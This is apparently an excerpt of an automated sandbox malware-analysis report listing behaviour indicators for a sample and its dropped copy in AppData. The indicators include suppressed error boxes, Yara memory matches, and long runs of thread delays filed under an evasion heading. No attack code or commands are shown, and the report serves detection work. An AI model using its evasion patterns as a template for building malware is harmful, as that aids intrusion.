                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Memory allocated: memory reserve | memory write watch (9 allocations) at 2280000, 2460000, 4460000, 8670000, 68D0000, 9670000, A670000, B0A0000, C0A0000
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Memory allocated: memory reserve | memory write watch (10 allocations) at FE0000, 2B10000, 4B10000, 8720000, 70C0000, 9720000, A720000, B0E0000, C0E0000, D0E0000
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Thread delayed: delay time (53 calls, counting down from 600000 to 593781): 600000, 599862, 599734, 599625, 599515, 599406, 599297, 599187, 599078, 598969, 598831, 598703, 598590, 598483, 598246, 598140, 598016, 597906, 597797, 597687, 597578, 597468, 597359, 597250, 597140, 597031, 596922, 596812, 596703, 596562, 596453, 596344, 596234, 596124, 596013, 595906, 595688, 595575, 595427, 595275, 595109, 594984, 594874, 594763, 594655, 594547, 594437, 594328, 594219, 594109, 594000, 593890, 593781
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Thread delayed: delay time (50 calls, counting down from 600000 to 593860): 600000, 599891, 599781, 599672, 599562, 599453, 599343, 599234, 599125, 599015, 598907, 598782, 598657, 598532, 598407, 598282, 598094, 597985, 597813, 597687, 597552, 597355, 597211, 597110, 596985, 596860, 596735, 596610, 596485, 596360, 596235, 596110, 595985, 595860, 595735, 595610, 595485, 595360, 595235, 595110, 594985, 594860, 594735, 594610, 594485, 594360, 594235, 594110, 593985, 593860
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Window / User API: threadDelayed 1880
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Window / User API: threadDelayed 7949
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6346
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3344
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7581
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 427
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: foregroundWindowGot 1778
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Window / User API: threadDelayed 2150
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Window / User API: threadDelayed 7665
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: foregroundWindowGot 1775
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599862s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599734s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599625s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599515s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599406s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599297s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599187s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -599078s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598969s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598831s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598703s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598590s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598483s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598246s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598140s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -598016s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597797s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597578s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597359s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597250s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597140s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596922s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596562s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596453s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596344s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596234s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596124s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -596013s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595906s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595688s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595575s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595427s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595275s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -595109s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594984s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594874s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594763s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594655s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594547s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594437s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594328s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594219s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594109s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -594000s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -593890s >= -30000s
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe TID: 8284 | Thread sleep time: -593781s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648 | Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8796 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8752 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -599015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598907s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598782s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598407s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598282s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -598094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597552s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597355s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597211s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -597110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -596110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -595110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -594110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe TID: 9000 | Thread sleep time: -593860s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599862
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599734
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599625
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599515
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599406
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599297
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599187
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 599078
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598969
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598831
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598703
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598590
